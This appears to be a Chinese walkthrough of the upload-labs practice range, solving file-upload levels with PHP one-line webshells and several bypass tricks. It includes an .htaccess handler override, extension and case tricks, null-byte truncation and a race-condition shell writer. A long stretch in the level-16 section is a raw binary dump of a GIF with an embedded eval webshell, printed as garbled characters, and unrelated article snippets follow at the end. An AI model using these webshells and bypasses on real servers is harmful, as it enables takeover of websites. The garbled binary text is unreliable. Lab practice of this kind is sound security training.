upload-labs靶场保姆级攻略
第一关:删除前端js校验
写一个一句话木马,命名为1.php
一句话木马
浏览上传
我们发现不可以上传,右键检查,依次点击
找到return checkFile()删掉,再上传
去看一下是否已经写入进去一句话木马
页面什么也没有,说明写入成功,去蚁剑连一下,连接成功
第二关:文件类型校验
我们上传1.php一句话木马抓包
把上方红框中的类型改为image/jpeg
放行后,查看是否将1.php写进去,也可以连接蚁剑查看
第三关:上传php同种类型的不同后缀
将我们的木马1.php写成1.php2或者1.php3或者1.php4等等上传
第四关:上传.htaccess配置文件
创建一个名为.htaccess的文件,内容输入AddType application/x-httpd-php .png
在创建一个名为1.png的文件,1.png文件里面是我们的一句话木马
先上传.htaccess后再上传1.png文件,再去查看是否上传成功
第五关:大小写判断
查看源码,发现没有大小转换的拦截
我们尝试把1.php改成1.Php再上传,在查看是否上传成功
第六关:空格绕过
我们抓包,把1.php后面加个空格在放行
再查看是否成功写入
第七关:点绕过
抓包
改完放行
查看是否写入成功
第八关:::$DATA绕过
查看源码,没有::$DATA拦截
抓包
放行查看是否写入成功(注:用hackbar,不要加::$DATA)
第九关:点空格点绕过
抓包
放行
查看是否写入成功
第十关:重复写绕过
抓包
放行查看是否写入成功
十一关:00截断绕过
这里我用ctfhub靶场的截断代替的
我们创建一个1.jpg的文件,里面写上我们的木马,然后开始上传抓包
下方两张图是更改数据包的前后对比
放行查看是否成功写入
十三关:文件包含图片马绕过
创建一个名为1.gif的文件,里面写我们的木马语句,在木马语句前面加上一个GIF89a
然后上传1.gif
右键打开新标签
再去访问http://172.16.1.140/upload-labs/include.php我们看一下这个源码
发现file是参数,我们在访问http://172.16.1.140/upload-labs/include.php?file=upload//9120241219173117.gif
再看看是否成功写进去
十四关:文件包含图片马绕过
十五关:文件包含图片马绕过
十四十五关可用十三关方法过
十六关:文件包含二次渲染专用图绕过
创建一个1.gif文件,里面放(注:这里的密码是zoe)
GIF89a ? 乙覍寣XXXqCCC芵\耨聃貂櫃橯U{玅P:::()K铑詾怂虽滗欓殚妹脫摀V)('''後喑吵X\吽?嬜换猾逋5苘埭いNE.?H刎佝彀{{{剟?埭uuuiii识壴fa譅冲bbb啄?yg舴鬻蜩谑z?wjPCFf猫NRx楨J曜?嬺?##$<剎["嬗?;W?喾-<?php @eval($_POST['zoe']);?> !逊-褨IMp顶|
郗6'疠?黢筱睈?"僬萚P=叩?=:铢枀d同y4=///nnnOOO祆鞛灋鳇蠍qqq焐1隍モ耛YPTz !? , 們剠唶垑妺實帍悜挀敃枟槞殯湞灍牎ⅲぅΗī氨渤吹斗腹夯冀究懒旅呐魄壬仕掏蜗醒矣哉殖~僮鬯俎哕崧邁(噔旰r?Tc#
s~臌磝?f澡Cp??怜~~浯纫? &怷Aq? 奃呂蠂X g抌塺#o!?r?T贪仴?}痼 ?9%骾 €侭
q酣嘤泦}$鴣@艇?铧h癙蛄c 鴳€r乃撷餾枟6Ip劫R?€€5F腨? ?
A| ??騻(仼4?lXgE C嵟穭?N?(啤曦垹ws@U_? 纙扳?(铲~???h悺呧j?杴蒴硜械砓钃!斧r?B?N<?=pn??3肌豨剨忨€Z拿
??l?C?爯}?鉫燩Q珅?"豠呂?個Z釷d ?袥+T€諄,D儙7?敇U$袵-^釂b??B?Yy? b?R6鬭@ph0罵?爛A(4Z*?`@&ctF繠X=? 7霖@Xz驛o臞fc€"缉U??4? v愢
隄(V3d#d)勹DE鐷g?鲠俋紕5儅I毻s?vo岏O€7
%缿
d懪郤棪Q%?園€O亇€ S*擱凟
J? X?垂勚e
+羸X?v?卯恼?虯臕5郧jr?Tcdp? h m皡 0??? c7k1JtQCr英?]?9卯众籃??榼 #A
( vTD聕鑼v儤逋|X) *
曅GJ癃,餎=u,?狋耆?@e栈t?午???逷9荁?讉?S 瘁!藒tYㄕ? 昹p?犙荺k意N{鈘? 脾8) ?類@?(李7%G鬛虵稦跧5茏袀i怴梥鈳鐽惲箩獸?畁奒p?哣掃赍G鏼5啹<+@O~埦?巢Q鮠U?訿霢*<@?
?蜣?鐄厀{革xe-P迖壬g3,?x?? L€ p?敄+o萫-?`D?€4 袄ヤ0k)叇n?0鞄wuJA?鍑絗鏜q繥 謬暅,l硓>P
榗(穒€秗i少?6??侤嘚B%丷?*H0
w4 貒*"奄導墠< 怴篾謬? 櫁B6箁$]t ?€ 藽S釒孳厧瘖睵8m?`?M諑Mt?鱻]隴贍阄疲=AG銩褷? (?E~?[??爟痍? @
t %N悇灢?Z艕B1芇?.俑?*X
?9緲
燶/s笃sB鯠en?抔vxxS?I€!56溑€F()矺?#┠??? 弛?偝M*墟Mp A@饊仹K瘹@b扥tH€??B?l&澣05=]?K尅2€捲5Ots?擛?M?8? >???拌J儎奼
褖"???)P楠てA龉B-$`&4*(鞉⑷??+?郙s?騯瘍L ;礝膄b? *^個?X艭me儴 4p肒$gXY?$筳-w罛!?b??(?r=羑6nc?牧H瓜
6P苐l?頧ㄘ屖.佃C?覲>
X] @?┮槧Z聝臡p/k)s曡p'*@"鳞(j+蚭X莉UX鎯r @?嗕? P? T€己y[c?桋?LN║??殺cy?筗?燘惩?犎?? H >9+;寅歞褻幜aT2繮鈸爠q湶暥魚馛鰯箹|5蜎 %5U?,8?D&€醒?燘f?9燖(XYr:贌?怲??1擸e迸懠'?電嗳?亭癜"覤雠>喱? p? 爄P趮?[6Dx齚H"v70?糐??膮d ?屃拸 ? ?`訝F羷}(嘙???俢F 銴+峿W潔秡5痃睽 ?+?v;粫CE'摩猌 ?狧7C眆P*Y鷑厗扥@C憔??厶H迦ㄑ拖?梻W&詈JblX?P顳?疊P?fc4|1漶`2腏?t ?L?弆囆7m?仭蝍-@`€x溿q€V爛ij€/賦Mx3 殤?~鰐? 圬O!€x萲s #@啎?|? x?Yc?"w+龋K??燚仦翆谠^繟`L邜? €牰8hO{qF饐8? ?├?剙 E?╠毫T?H`t綪槒鏤鹿x粗礱?|?霡?
畦狆铱1 籿V黌蹺蝾Q慦?V` 诙?qp?0?€`?A ? 咐=h.N
捺傁尪W穫?-?(-v, B叿?+崱jp揄L緣% <庴
昝?d@_
@^瑓濂??缸f??@Tn祔缁 €D 0磥 0(AY? 幽a厄uCu3?v? d鱤,?u?厄Q日u缨Dh~ #謗CO1;灔7?(?-p€%鱚}@L?J??涹`5悠p羋\}`4Cd-PW?s 氄m$ Q/C#`BcLp! #lFU!?齻K??餑?Erh=攔 s繸G?喰K?%@%苾WP!2S?8?海U揤iYPP
?` (軻 €
#餰[b*P埓?殖(儬)?7?郵4D?\Tb<v?扌%F?"?gL姌醭3 ~8.?Ir壍q呩A-烛嫳?BM???朤 嵮XOq/`/櫬`$=!s呧@?X\莡s€Zo 鐚暌u?8?!X17}? 8戴_┴姀??w} B丗REF??Z酙紅0?Xgm?QW(鐝#?!??蚖&v$Cap?)@??泃〔&圩s@Fe45?=}0O鹓1v?0鉢0iFb?9蜽@%騃?€ウ `Hs袽K倐€0?x#` *?C!:柞?#?晆)?Q0?0瑬晩YnB(??岫y恈-?靡w琣皥+ㄘ殥慒?p€5?柛槵?KD葾娪)$?€?n?歊<?w?ZQ3懕涷? (酘S?`P^2V?漧?+羑?>D.凱#* K蟩=J#啑0€J楒o??繺I憢€鳍淥?/?Y ?潒?5p傂皊? n??GD?s1?C (醆rPvn?cAr`?h&熮R?@漏?JD企:謮唚q曆慦"!嶠à!%5嵴1]v戇悩]?/!汻耚?iv?>R[#*?@%/N?鋰
?0D堁a4%?P# %?EgD夰oK劊货?ぽ2id?媠Z?j丂藹?X 呰饀ct<駭淰FV?wvy +PWp€>*%荣师?X ? ? #"喦P0dqP_$钓D惵??i檭鵔,G錦鯣扵"煋SCQЗG?X莲貋〗?逘*` ^畾-燙p-?第 Xa?﹫殅?l:5爧惊┚?Pr薂0,!C')
鄧臕?)?1%?*?`rr吚C4?}?dp\衃?? #Y?鞀類 d?]稯?a?? -??粕癉e唨@賭譐桊&门塩&郯q?Y爱?j?c? vP?鷃??$pt⒉黩*%(g5? 肘a噣Q1\?p6k硆?c?x肖??`?!喆It乺xc? F?!啇褠寬KX?A=]膻?b貏碤 `裂%q%*$硉諭昩??22规瀴U?@?袱杽?葊7薨hpEC???0&岝 瞩櫆C]?婩咺bHF枱?05欼簛k#:勄癶瓡 ?D?`c`,寯????/ 5`? 3€<g謻嚑庞L吋ほ沢嵗€o儛t刉T0<#@-皢U襲垔磩艱~pG?@!b?録jd齛铬妤桶( 獌? |4&濬q#=Q毬0o3k?^? ?o4:;;雕u?<,痒ツ繥["^&QGU1,s1/$?ZaH銝捞?@%汥GU襒”f壝
?霣"羲}K?4A琜啧
鄘
? 537T#攄洠?j馾?, 凘o諂觉把q嚺??血拎k??茩( 鏦Y€ ?g?邏否7 袕矪N0(?/[S€屆瞅
撩綪?€i"cL 窇T衯3 ? ?7zaUC p!C*? 珸慙?縒瘭勡(^B$?鍣Sx?B" x遐5`
?`夓?蜏人尲??? ?挗)抌 Q腷篢辶a(`Y鄓.p€o纁舨h栣5#S?縶嚕餳0"圈C?T+'唈1#€r?7唓JWXp?d粷ab,?褋{宓莧?Q?MtC羴 .酂唨??p_?? 3p?弲?2嵜?B蟣;?郞毁Zv+h 纎?^讖轅点lh覵莸4?€?鎠q铕噣??g瑶0杘N靂?-~P<牬mM?@%珌识?擛熰孆t?颗c使az?m?F鵼資?蝒檧硆?砍耭▆ j鈉苴伝Je蹠@t哦}?跒煭蹜€欫筵?2E軖p?嗆?]浲軐€tt]蠱?馉覯蒡?5泌??蛰迧癗?蓼?趚揶4蓼唤?6莛m?逥?????僲ILl党W∕?N佫y?薨啀?乺? (?罀`5鹎凗bV錥?8映!K窆预??峠?C??_`〢o惼Lw蝹?瞰僚A).祚nQ?GH?郞橥緘p糏瞰
氥躊up?t5) lPW.?塾禲薨KBM?鳳?@O5y`P??脪﹐~ま孀0?癬骃汋Y]傠鑠?檏A(??綜?aY?辁﹋(?斠
g劋i歑??)?ⅷd%?5?%勱T进闓ZR?鐓?魛枇4 ? c€T??@[q~?i*錁 枸蜑旸6丫骟&?榯2?0毘睑箚轓柚??Y[T?o狀蓓.熳@?孾D?Q脟镆馆F@
褠PL冸接E?莃鹧賑d?j!睿I暷x?
Y醲P艊匮??殛€Y萕忺g歔P 沘 \无榷遐摠t="酫???/?鶵炤€秎瓨贰?A"鄺'9?`鬺?<€魿?蒇[楃bPwL\C C)泐坌?f?v纼?9?Z?P侽O狏厄歟?哈4坺秸辀9悅y\k9?0T?F?>0e@燨C?b(蟸3 ?zPp?盌B? >鲷偮"S磬~?C?爔!嗶窮(霯9??f)碆c?????燂麪?:p!窇汒j$5`}?跢?Q1z慰*7Pr?罬?蛹乢97. 槛?K=€`譿徵鱳垬ǜ蓉桫) I夥宴D?觅轾?罛嬖稱圸堶肿Z?+;﨣[k?TF裑Vr雵行?恷Qb?鹦PcQ8Ym}崫崢郍P\?:>戲RCチ翡泱斻鰽曱V)専?+︺誎?|.鶳筽!橞f}2 菳5m+Z碫罯?o4?扴?H鸂耨甡r,荣3f>-9r?
&S郻劚?&^<?)仴呗厊?艞>l? 鋟Sχ璡Q?褿 2焥Z? 犩酆?罯蜭洖倢0€茤,i|\?癭a鈖鐦>-喲C瘤璄X H~耐?睨柣疗
e紙?5?}FH倐}?霸抢硭揝郪▊?e蕗螢A?A祶蔪禤纳?藧严?"瘱j脤
\蠵(婓?<餝蠨
虥嬏;?/鳣漸n?祋@ 啀 A!孭 嫜塛喌箩3LS葇袅W亗lp?(鎰f蹃.蔇@3o鬌謝Y淩HN車?? ?*|`?qd??L@?蛟PNヨIT协鮞桖ㄐ?
?€Ja}恑H彄cn鳡侭`鈕泡鍳 蒑Iex裀?NjI(- @蓳O-G*? _歫FR?}i,?T
p剪 摷捧纗N盶?懺G練B夊S s癰 p卲9? L害\篳K-d椓_蛗AF獇夿J? €€髁觎a?hP?崹纅鑷 }`i?汪?~T€oVP?﹋N}k?Hr‖崁Y諃#*s? q隦鶣3蹅k?9怜椵V+h熳_s,餏o猣?3辣埊J怑
+攢PB?瑦y?朗+ \尡弃堂憛 累m$(视???阪*竊???俩L鼏DP#鼿!喗蛯€c椺q T[M%Jt憗D[XA 奥a噊耙€啜T@?v齿?fi絆铆甗KwUK沚
Q?锣丈甭?5G?刺!姗p倮mS轍!`/L楃?#?亗hD況Hx綈鄯??m? A 伧 L`x?嚅?(?锝優?兟4Gv槗pYq懤?P茑g,?€
P€砇???hC皃鵕?篞屧?A兠}?檕U?] G
%@?/hai ?€a 7!8@?zbL耹A側鶃5囫C?笀B唉(Zb\p!x
b樌 N??(uaN?蠵獒r?胠11№C5壤s
)"???ざb√鄡I ^? 塘癪夂D?,n?0B?i € 銴 ZX`1膬 棽?;眈倄h??AJMx樌? ?d郹#x? Z爛?H€? €LdRQ$癅 繦譗A
悁鉦鯋窣Ap鑔|X?檋`V??/?磞&b癞?
埫bZ憗\?PcL 蠢 椞?~??€[
?囏D誓]◆C仙G?@@圽塭sDG<
1荤€=??r谸7l .Y蔍V ??'旮楼鵄E?8B迎xs杫"E 太樏禂?虌
-釜u缞8孍`??<甡Q?j嚵奟n?AC宇1乷?Q噦 N 什蜵涀(?T@h永? P倒嵢軞?u色Z9T??$ <榃.?&?葞>嘞甽4,豪殤=?r犅碬€硤@吇ZだKU"}?T嘈
*(唷k黁俧€萵EO襇lln[划醒X聬I芴鶤V?蘹ts疌?8P蠳抁]YL嗪爹玍* 楔VN粫??理?魳轇Ll 怅??蹳 tsS狳?Xl~c??LK璙
r旫?橧oq3飚?g?濪 P?糝穆(瑼磱??獣犤€甃`c`?|
s邙厴€俵?-?z]?"Dd}郃O<1>R<?@頱釼牷`>饋??aK@I僙?繮奡5,nN?4`榙鞢森婓婋庢?婷? m?ㄠ叺?.X!X0喦V[G沣
?对K瘶\嵮姍`?s?a裾↖輱H縪9皞8R€?@謀蚯凙F閆QF蕩玠2?\y?嗬燚Ln????X罯PF€?剚讴↖<稹箚?型蓝cSV冊F+@闏炆]n卹胳^颪醈?D??€r竝纏3x?t鄺^? 0?jJP[蔦4熇(祍馃癇hM?{躿6?€s霤paq励,氻 q袄
J?Z迅B劻桓?猲??F佡??榏\r瀞A堳 ?:xp椄9鄆坃9g J?>w螃?)?茸橅腗?O@} 纙i蟼?彜D谍V.Sb趑? w?掐y癧u◆n瘄B1€??胓?Q?r缷躯?宝?奱鴭9F踎s?D顾B?&袑? 飠框瀧`=萐P^V?詀鉜0|茸h&琄?棺?t ?4#'v
4/?@发匬€N\?F覹z辗w}PX~穪珸6SZ??9衶?*郖?吼x*?Z0?4谱vd5c郩ヒ%s`?€Dwz槪€囸9效0Ha皁?9€*?:p丂W傱嘢?
鈢F鏵叚p錠€78c:秲囆=绵.燚刐?:?Lp~|卣d?34鼦%颜 E" B?喻i7q?50?唶`!?}0Nw唴?謘S壑剛?GpF#癭CG堜?B?媥鱌'8p揦(8?q?K秎ㄐp翮 F0P拠G c僗姦Gl:▕0(@c????5pS迺磥&眕a]2|?|嬹p猫wE鱵莤KbDe?涾??硏i阊k盄 v菎荑崵庛fn?(澍?僽嬰x 枹3曾?悈`5P忲鑠鴺徛咷┓凎€ `f?G惄慈+承CG饜鄹?懻梼箖 p
鍖)^9?d?洏椻 瀀捇貕9??掆?8sj2y 1#rF6# Q$4乐= |<蓫`A^)izW?圱??尅?2e8穊婦/? `屄? ?`昘y?習4}W擭BG?% ;疿枮??(@oゞz6nW?t?倄楘Hl?栶1邌騁/b剛 ?M? ?/厾?袠?lW皳?4選椻菵E?恦?筲/?o? ?椸%?*?償
黵)鏆疘??I@檹€}GG敧?z" K8|??.燫誥U錮啈蠭$??澰I濚閾釼欎?埱H @ 瑎d稅摥a.諄皭諵{5塱q繷?c癵鲏燌ye?禮?搥荴 楌霐qa ?03?揬覕绷C?e?姡z?錐l[贌?XB庽1rU)??樀0殣g?0慤N`}0}殻嵣i^?6X? hr屰S#衏窅]G飮
y?~0S肖?
?扪yー]P"?括跇?o贌?ps??溟k獅紁S?R0z t:橆鉃绷f
?zR*&?滷蓾ac?Z戇﹢疳.F::鄕鹤 k?@?`L盇.讟N}?I w 6P灦?*?枃f狧2
猗??C?呅?€;?M?F怷瞐扰塤瓞袣wi怔渾}X獫匄?燼X 取c穩頖Ch?肖?V癝I 婣~z鯶;?j€瓪`箞q?駂旆)?V?; k0?4墏TP?栤j?[▏慮H堚? <q?鴲O??睍柃ずE#鄷?? € F`"瓞] l儶瘻f^K}喔g}?軍 ?Z?磖K銘? ]€?P謬殆y璠纱#?/a谤€扩満繁@G觝+?€z2hN5?WJz嬎?4?尛J&??fsz?q?R€??72幊冩(9?ê€挴聘埛1蔤t+牖?p??墾郠F鶻U唚藡??(?c藪[咥鑲仉D??陛??稲hV墾惇昊2鏄DWn=?槱娷P"{?t?D@經亮j掣劭輯臔M诵紽箒rG屰g?cC'cK?萿? utb2坏? 郢?;嗔輯║aq?o饅╬ Y?Zn8FG??c?@l?8錁朆* p管???癌?评3?f裍答k浥脎椩%#`M?j蹳梆 R惪2;聟?2 20Ki- 橅鍄c ?H7石?F蕠#〉僸?v S嗳k 聇\礼s?徜?1多
U茫胎錟?0hF Zf?e噮敖R?鵎舜?q ?"9i匠p$?贴? 苗G釖鍙!S荁<统忻:So0NBWf(?3H酞W@扐!D柾?g"k?C芪? 獈€B崾铝zF虘;-秀7 ?r@? ] 9??惘汀????硌鵳 #P泷??W溇*龤?`Fぱ?些)?薑|嗐! 韎d`湶`)y訟?`險訬]厶旍?嬨tR?7?詹 啥鷟e啮pYa?\b玔伩苂?絟 織Q?$鄲唜誂m^#?骒??`??~ 蚅蚾?F袨k=~溫巠?諸a)∷佈発尒摳颅??0?趝?牓裶伷'?2;硲蘯 ?瓻鄢 c üm裛a4?(?%?S捌腯?倁森芴-澪}z錻贓yU溦S€貲H Uc`;昀M纔6?]?s<\q?q?<cE] \"冼??[?f欣-藼?
?q 釀b谺 0? B?輭 霰逤Eez;庹a豙p'p 0€崂?鄷TE?V???€? '?抓=癮)aw??K~{€?^?腑1螞|錤1犣Ra2`=5`{p \庒X?獷蚭c欁e $ €藀
?i鱄"? {厘噱u~瑽J潋?1檠t] ?厼掕B`€n?@? 鐜铊0犫蛦*Gx?判?顠 +0?葔d戢铌p~馑~?绨五j芯?结闹kx炵9釢?Z ?性H欹~飕剔煜黼韂N^i}﨨貫?砘郘+P璁h祁婢汨铎晡?_鹞?蚽k遑炵桜z?P蕻? 钋M?铌快蝞?/蜢毋}啾绿餙+玊巆髮?繦<鸋[p?锺??象韼)]胴?趪腚呇?P狅磽8鋷???/鮏襄?澹籆铕維.张R( *嘚霣愱??O鮧唧%蚵錄吶獔
锱??%鰩D阥??霄兛?
_鐮?a觉?0?B $?梨髟?瘅\駝稆勶钤>蔠钝s?R淵 媱馿 鯚O麨n0?炯?掚饄綹e鐰?pl麤宵灴鉣€?}璬J锺?嫳[ ??- c唪f痫溸焱o??}zU?蚖鏬P騷 `栂莪圜{們剠唶垑?55??|摂晼棙?G}v~~、¥ウЖ┆?焴T}]00{f}o 緹
T5}荁j?祳醒矣詤?}K挋哙?}3燓殛耄?c}f秲乌c%慨$s3o侨?sv郱祪**葓=m=8剾鴯脪>q€b潜c荗F袅饘?7莊h瑗a儕茙u1超YA?sdx摿 罰忧丏奌+Y煊€繤廝"鶷釤檼&}?覈J +?杜寷佄t猐媹?€?徭DP??9?)?}2$x*祊酧vd輁$W.W€}j榚扒V稑s?W钴蟯鬈萑呔9\??冒=~`拳C孨槈笶? ?f帗!g ?+燓|磋=5L?壸背?揄?zc n?耋袑飰患絩犳痬砢羣婗臭憖]?T?蠤顶'歱?(峲旃玎\祏?Y詗逥蹰鰽uH?$?酈?h?&鳡{敃(HAB<b邊醦`D?驷幁?@[<w鈵;渐鈯?
寎\1#?舝?v?5孒鋿?垽兺筯?]???l覈
TV檫'd@鄔\謎
]_?D媌Z??瀴I氫感趠2肏犯彖F*椁擵
㎡y2梙?i鯀*戗J闞q
[ ;<?php phpinfo();?>
上传
访问一下include.php看下参数,参数是file
再在include.php后面跟上?file=upload/7216.gif
在查看是否成功写入一句话木马
十七关:抓包爆破条件竞争
创建一个1.php文件,里面放
<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>'); ?>这个木马文件,去上传抓包
右键发送到攻击模块(Intruder)
一直点刷新
直到出现了webshell.php在停下
再去访问一下看看是否成功写入
第十八关:上传二次渲染的图片马 文件包含漏洞
和十六关相同
第十九关:文件名命名规范
创建一个名为1.jpg的文件,里面写我们的一句话木马
浏览,选中1.jpg
重命名为1.php.或者其他的文件名绕过方式,然后上传
在检查一下是否成功将文件写入
以上就是upload-labs靶场的攻略!!!
相关文章:
upload-labs靶场保姆级攻略
第一关:删除前端js校验 写一个一句话木马,命名为1.php 一句话木马 浏览上传 我们发现不可以上传,右键检查,依次点击 找到return checkFile()删掉,再上传 去看一下是否已经写入进去一句话木马 页面什么也没有ÿ…...
02、10个富士胶片模拟的设置
二色彩 1、色彩的加减控制全局的饱和度增减; 2、色彩效果只提升暖色系饱和度; 3、FX蓝色大幅度提升蓝色系饱和度; 4、三个参数都不改变颜色的色相。 2.1 色彩 色彩调整的是拍摄画面整体的色彩饱和程度 2.2色彩效果 调整的是画面中暖色…...
大模型呼出机器人详解
大模型呼出机器人详解 原作者:开源呼叫中心FreeIPCC,其Github:https://github.com/lihaiya/freeipcc 大模型呼出机器人是基于大规模深度学习模型构建的智能化客服系统,它能够处理海量数据并学习其中的规律,从而实现高…...
(山东省大数据职称考试))
计算机基础知识——数据结构与算法(三)(山东省大数据职称考试)
大数据分析应用-初级 第一部分 基础知识 一、大数据法律法规、政策文件、相关标准 二、计算机基础知识 三、信息化基础知识 四、密码学 五、大数据安全 六、数据库系统 七、数据仓库. 第二部分 专业知识 一、大数据技术与应用 二、大数据分析模型 三、数据科学 数据结构与算法…...
图层(下))
【Unity功能集】TextureShop纹理工坊(三)图层(下)
项目源码:在终章发布 索引 图层渲染绘画区域图层Shader 编辑器编辑模式新建图层设置当前图层上、下移动图层删除图层图层快照 图层 在PS中,图层的概念贯穿始终(了解PS图层),他可以称作PS最基础也是最强大的特性之一。…...
基于 SSM 框架 Vue 电脑测评系统:引领电脑评测新方向
4系统概要设计 4.1概述 本系统采用B/S结构(Browser/Server,浏览器/服务器结构)和基于Web服务两种模式,是一个适用于Internet环境下的模型结构。只要用户能连上Internet,便可以在任何时间、任何地点使用。系统工作原理图如图4-1所示: 图4-1系统工作原理…...
Android笔记【19】
具体示例 run: val result someObject.run {// 这里可以使用 thisthis.someMethod() }let: val result someObject?.let {// 这里使用 itit.someMethod() }with: val result with(someObject) {// 这里使用 thissomeMethod() }apply: val obj SomeClass().apply {// 这里使…...
Redis 中 IntSet 底层数据结构
IntSet 底层数据结构 序言: 像字符串 SDS 只是保存了一个变量的值,但是像 Redis 中也是需要保存一些集合元素的,这里就介绍一下其中一种集合 IntSet,由于是 Set 所以也有 Set 的一些特性,不过也多加了一些特性: ● 唯…...
自然语言处理:我的学习心得与笔记
Pytorch 1.Pytorch基本语法 1.1 认识Pytorch 1.2 Pytorch中的autograd 2.Pytorch初步应用 2.1 使用Pytorch构建一个神经网络 2.2 使用Pytorch构建一个分类器 小节总结 学习了什么是Pytorch. 。Pytorch是一个基于Numpy的科学计算包,作为Numpy的替代者,向用户提供使用GPU强大…...
Altair: 轻松创建交互式数据可视化
Altair: 轻松创建交互式数据可视化 Altair 是一个基于 Vega-Lite 的 Python 数据可视化库,它旨在简化数据可视化的创建过程,尤其适用于统计图表的生成。Altair 强调声明式编码方式,通过简单的语法,用户能够快速创建复杂的交互式图…...
建模工具fairseq使用详解)
【NLP】序列到序列(seq2seq)建模工具fairseq使用详解
文章目录 一、fairseq简介二、安装方式2.1 pip安装2.2 源码安装 三、fairseq命令工具3.1 fairseq-preprocess3.2 fairseq-train3.3 fairseq-generate3.4 fairseq-interactivate3.5 fairseq-score3.6 fairseq-eval-lm 4. 常见报错报错1 参考资料 一、fairseq简介 fairseq 是 Fa…...
[极客大挑战 2019]HardSQL 1
[极客大挑战 2019]HardSQL 1 打开实例,发现是个登陆页面,查看源代码,发现又是GET提交check.php 万能密码尝试 不太行,怀疑字段或者空格被过滤,尝试闭合不加其他东西 确认空格、union、and等都被过滤了,尝试…...
天空分割代码
目录 依赖项: 分割源代码: 依赖项: groundingdino Grounded-Segment-Anything 分割源代码: generate_sky_mask.py import os, syssys.path.append(os.getcwd()) # Change to your folder here sys.path.append(Grounded-Segment-Anything)import argparse import os…...
Leetcode 三角形最小路径和
算法思想与代码详解 这段代码采用的是**动态规划(Dynamic Programming)**的思想,用来解决“120. 三角形最小路径和”问题。动态规划通过将问题分解成更小的子问题,并通过保存子问题的解来避免重复计算,从而提高效率。…...
[Unity]Unity跨平台开发之Android入门
安卓环境配置 安装依赖项 推荐使用Unity Hub进行安装,安装时勾选Android Build Support、Android SDK & NDK Tools、OpenJDK。或者指定已安装的依赖项。(注意:指定的依赖项需要是从UnityHub安装的。比如之前安装Unity2022时勾选了上述依…...
搭建Flume
title: 搭建Flume date: 2024-11-30 23:59:00 categories: - 服务器 tags: - Flume - 大数据搭建Flume 本次实验环境:Centos 7-2009、JDK 8、Flume-1.11.0 开始安装 1. 下载安装文件到服务器 # 使用wget命令下载flume文件(二选一) wget …...
【从零开始入门unity游戏开发之——C#篇10】循环结构——while、do-while、for、foreach的使用
文章目录 一、while 循环1、语法:2、示例: 二、 do-while 循环1、语法:2、示例: 三、for 循环1、语法:2、示例: 四、foreach 循环1、语法:2、示例: 五、总结对比六、注意事项七、使用…...
flask flask-socketio创建一个网页聊天应用
应用所需环境: python 3.11.11 其他 只需要通过这个命令即可 pip install flask3.1.0 Flask-SocketIO5.4.1 -i https://mirrors.tuna.tsinghua.edu.cn/pypi/web/simple 最好是用conda创建一个新的虚拟环境来验证 完整的pip list如下 Package Version ----…...
MVCC了解
MVCC(多版本并发控制)学习指南及代码示例 一、学习MVCC前先了解什么 1. MVCC的定义和作用 MVCC是一种并发控制机制,用于解决并发事务访问数据库时可能出现的问题,如脏读、不可重复读和幻读。它通过为每个数据行维护多个版本来实…...
LabVIEW随机扫描成像系统
利用LabVIEW开发了一套随机扫描成像系统,利用硬件时钟实现声光偏转器(AOD)的频率控制与信号采集之间的高速时间同步。系统利用了高精度的时钟同步技术,确保了成像精度和重复性,从而有效提高了成像速度和质量。 项目背景…...
系统移植——Linux 内核顶层 Makefile 详解
一、概述 Linux Kernel网上下载的版本很多NXP等有自己对应的版本。需要从网上直接下载就可以。 二、Linux内核初次编译 编译内核之前需要先在 ubuntu 上安装 lzop 库 sudo apt-get install lzop 在 Ubuntu 中 新 建 名 为 “ alientek_linux ” 的 文 件夹 , …...
【一文了解】C#重点-委托1
本篇文章来学习一下C#的委托,委托是C#中的一个重要概念,它允许将方法作为参数传递给其他方法。C#中的委托类似于C或C中的函数指针,并且类型安全。 委托 1.委托的定义 委托(delegate)是方法的代理/代表,委托…...
LeetCode hot100-87
https://leetcode.cn/problems/longest-increasing-subsequence/?envTypestudy-plan-v2&envIdtop-100-liked 300. 最长递增子序列 已解答 中等 相关标签 相关企业 给你一个整数数组 nums ,找到其中最长严格递增子序列的长度。子序列 是由数组派生而来的序列&a…...
项目26:简易在线论坛 --- 《跟着小王学Python·新手》
项目26:简易在线论坛 — 《跟着小王学Python新手》 《跟着小王学Python》 是一套精心设计的Python学习教程,适合各个层次的学习者。本教程从基础语法入手,逐步深入到高级应用,以实例驱动的方式,帮助学习者逐步掌握Pyth…...
知乎 PB 级别 TiDB 数据库集群管控实践
以下文章来源于知乎技术专栏 ,作者代晓磊 导读 在现代企业中,数据库的运维管理至关重要,特别是面对分布式数据库的复杂性和大规模集群的挑战。作为一款兼容 MySQL 协议的分布式关系型数据库,TiDB 在高可用、高扩展性和强一致性方…...
 Iris(R) Xe Graphics安装Anaconda、Pytorch(CPU版本))
Intel(R) Iris(R) Xe Graphics安装Anaconda、Pytorch(CPU版本)
一、Intel(R) Iris(R) Xe Graphics安装Anaconda 下载网址:https://repo.anaconda.com/archive/ 双击Anaconda3-2024.10-1-Windows-x86_64,一直下一步,选择安装的路径位置,一直下一步就安装完成了。打开Anaconda PowerShell Promp…...
RK3588 , mpp硬编码rgb, 保存MP4视频文件.
RK3588 , mpp硬编码yuv, 保存MP4视频文件. ⚡️ 传送 ➡️ RK3588, FFmpeg 拉流 RTSP, mpp 硬解码转RGBRk3588 FFmpeg 拉流 RTSP, 硬解码转RGBUbuntu x64 架构, 交叉编译aarch64 FFmpeg mppCode Init MppMPP_RET init_mpp...
揭开 Choerodon UI 拖拽功能的神秘面纱
01 引言 系统的交互方式主要由点击、选择等组成。为了提升 HZERO 系统的用户体验、减少部分操作步骤,组件库集成了卓越的拖拽功能,让用户可以更高效流畅的操作系统。 例如:表格支持多行拖拽排序、跨表数据调整、个性化调整列顺序࿱…...
常用网络协议简述
网络协议是计算机网络中规定数据交换格式和交换规则的一套标准。以下是一些常用的网络协议及其简要解释: HTTP(HyperText Transfer Protocol,超文本传输协议) 用于从网络传输超文本数据到本地浏览器的传输协议。基于TCP协议&…...
本地电脑使用命令行上传文件至远程服务器
将本地文件上传到远程服务器,在本地电脑中cmd使用该命令: scp C:/Users/"你的用户名"/Desktop/environment.yml ws:~/environment.yml 其中,C:/Users/“你的用户名”/Desktop/environment.yml是本地文件的路径, ~/en…...
笔记day2
文章目录 1 NavigationDuplivated警告错误2 Home模块组件拆分3 三级联动组件完成4 完成其余静态组件5 POSTMAN测试接口6 axios二次封装6.1 为什么需要进行二次封装axios?6.2 在项目中经常API文件夹【axios】6.3 axios基础不好,可以参考git|NPM关于axios文…...
——归并排序、计数排序)
排序算法(3)——归并排序、计数排序
